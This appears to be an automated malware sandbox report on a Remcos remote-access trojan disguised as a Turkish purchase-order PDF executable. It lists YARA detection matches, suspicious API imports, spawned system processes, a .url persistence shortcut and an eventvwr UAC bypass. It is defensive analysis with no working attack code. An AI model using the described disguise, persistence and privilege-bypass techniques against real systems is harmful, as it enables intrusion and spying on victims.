Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\Public\Libraries\wflizeiulE.url, type: DROPPED Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\Public\Libraries\wflizeiulE.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Contains functionality to shutdown / reboot the system
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait 3_2_0040D2A6
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054F910 atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress, 3_2_1054F910
Detected potential crypto function
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E9B05 0_3_036E9B05
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E1A14 0_3_036E1A14
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E19E8 0_3_036E19E8
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_038D3D3F 0_3_038D3D3F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 3_2_0040D2A6
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10541006 3_2_10541006
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 00413E72 appears 49 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 0041203B appears 31 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 10555801 appears 49 times
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_105555CE NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 3_2_105555CE
Sample file is different than original file name gathered from version info
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310969892.00000000022EA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
PE file contains strange resources
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Eluiezilfw.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Eluiezilfw.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: archiveint.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ?????????.dll Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: archiveint.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??????.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: archiveint.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??????.dll Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll Jump to behavior
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File read: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe "C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe"
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: unknown Process created: C:\Users\Public\Libraries\Eluiezilfw.exe "C:\Users\Public\Libraries\Eluiezilfw.exe"
Source: unknown Process created: C:\Users\Public\Libraries\Eluiezilfw.exe "C:\Users\Public\Libraries\Eluiezilfw.exe"
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 3_2_0040EC0F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055059E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 3_2_1055059E
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Eluiezilfwmdrgrdfrqpnwmurrnwnhm[1] Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@9/5@19/5
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00411927
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00409A2F
Source: C:\Windows\SysWOW64\logagent.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-MZPAVR
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource, 3_2_00409D02
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
